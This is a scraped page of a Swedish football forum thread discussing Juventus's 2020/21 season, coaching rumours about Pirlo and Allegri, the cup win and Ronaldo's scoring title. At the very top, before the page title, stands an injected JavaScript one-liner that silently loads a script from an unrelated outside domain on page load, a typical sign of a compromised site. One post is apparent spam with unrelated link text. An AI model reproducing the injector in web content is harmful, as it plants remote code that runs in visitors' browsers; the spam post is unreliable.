;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Juventus F.C. 2020/21 – Sida 6 – Arkiverat – FMSweden Forum
Meny Stäng

Juventus F.C. 2020/...

Share:
Notifications
Clear all

Juventus F.C. 2020/21

119 Inlägg
14 Users
50 Reactions
4,102 Visningar
Challa
(@challa)
Estimable Member
Topic starter  

@peter-hecktor

Tudelad. Allegri spelar kanske Europas tråkigaste fotboll. Samtidigt är han en otroligt bra tränare och vinner matcher. I dagens situation väger det sistnämnda tyngre än det förstnämnda. Allegri har ju ett fantastiskt facit i Juventus med 5 ligatitlar, 4 italienska cupen och 2 CL-finaler på fem år.

Man ska också beakta att det inte finns något jätteutbud av tränare i övrigt. Eventuellt skulle det kunna bli Zidane, men förmodligen lutar det mer åt typ Gattuso om det inte blir Allegri.

I vilket fall kan vi konstatera att Pirlo måste bort.

Mitt liv är en multimediafil

SvaraCitera
raca14
(@raca14)
Reputable Member

@challa

Allegri förknippas ganska starkt med Real Madrid nu också. Ska tydligen ha varit i kontakt med dom redan...

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

@raca14

Stämmer. Ryktas en del om Gattuso till Juventus också.

Man kan nog inte helt utesluta att Pirlo får stanna om han löser en CL-plats. Magkänslan säger dock att det är osannolikt trots att Paratici tidigare i år sagt att man kommer att fortsätta med Pirlo om klubben når CL. 

SvaraCitera
raca14
(@raca14)
Reputable Member

@challa

Ja, lär vara mycket snack som inte stämmer. Likadant överallt... "Han sitter säkert" och sedan är det kicken morgonen efter...

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

Frågan är vilken tränare Kulusevski skulle må bäst under? 

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

@raca14

Ja, Paratici gick ut med att Allegri stannar till 100% ett par månader innan han lämnade. 

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

@zxc

Han skulle nog må sämst under Allegri, som nu verkar vara så gott som klar för Real förövrigt.

Juventus offentliggjorde idag kommande säsongs hemmatröjor. Riktigt snygga för första gången på länge enligt mig.

http://www.youtube.com/watch?v=IOYfgCTvhdo

SvaraCitera
(@warlordtwo)
New Member

@challa

Why is Juventus not in FIFA 21? This is due to FIFA's biggest rival Konami-created Pro Evolution Soccer with exclusive rights to the team. This means that FIFA 21 will not be able to have any of the club's brand or stadium at its stake.

Jiofi.local.html

Forpc.onl

This post was modified 3 år sedan by warlordtwo

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

@warlordtwo Misstänker att det beror på att man får väldigt bra betalt från Konami för rättigheterna. 

SvaraCitera
friggan
(@friggan)
Estimable Member

Dejan bakom båda målen i cupfinalen. Och hissningen av Buffon efter matchen, rysningar! 

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

@friggan Riktigt vackert. Och Dejan var fantastisk. Av någon anledning blev han inte MOTM, utan Chiesa fick den, trots att han var rätt anonym utöver målet.

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Rapporteras om att Juventus kommer att ta beslut om Pirlos framtid på måndag, när säsongen är färdigspelad.

Personligen tror jag att han kommer att få stanna om man lyckas lösa CL. 

SvaraCitera
friggan
(@friggan)
Estimable Member

Douglas Costa lånas ut gratis till Gremio. Jag tycker att det är konstigt. Han var en spelare som verkligen hade något extra. Definitivt inte alla gånger men då och då!

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

@friggan Han inledde sessionen i Juventus väldigt bra , men har blivit successivt sämre. Intressant att man lånar ut gratis, hade ju lika gärna kunnat behålla i truppen då. Känns som att det finns någon talang eller liknande som man jobbar för  Gremio.

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Juventus löser alltså CL i sista omgången vilket summerar säsongen till:
- En fjädeplats

- Vinst Copa Italia

- Vinst Supercupen

Magkänslan säger att Pirlo får stanna med dessa resultat.

SvaraCitera
friggan
(@friggan)
Estimable Member

Igår spelade Juventus riktigt bra för en gångs skull, vilket ändå gav lite hopp om framtiden!

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Med sina 29 mål vinner Cristiano Ronaldo skytteligan i Serie A. Att en Juventusspelare vinner hör inte till vanligheterna. Sen Platini vann tre raka mellan 82-85 är det bara Trezeguet (01/02) och Del Piero (07/08) som har vunnit skytteligan förutom Ronaldo. Rolig kuriosa är också att Del Piero vann skytteligan i Serie B 06/07 och därmed är den enda spelaren som vunnit skytteligan i Serie B och Serie A rakt efter varandra. I sista omgången 07/08 stod Trezeguet och Del Piero på samma antal mål, varpå Trezeguet gav en straff till Del Piero så han vann skytteligan. 

SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare

Tycker det är intressant att folk skyller på Cristiano Ronaldo när Juventus går dåligt. Utan honom hade man inte ens nått en Europa League-plats.

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

@peter-hecktor

Håller med. Den stora negativa delen med Ronaldo är att han har en uppenbart stor negativ påverkan på spelet. Han är dessutom väldigt dyr i drift. Folk glömmer ofta av att utan Ronaldo hade Juventus kunnat värva 3 andra nyckelspelare och med det till exempel kunna få ett fungerande innermittfält igen. 

På tränarfronten är det kraftiga rykten om att Pirlo kommer få lämna och att huvudspåret är Allegri, som dock har Real som huvudmål och inväntar besked om Zidanes framtid.

SvaraCitera
Sida 6 / 6
Share: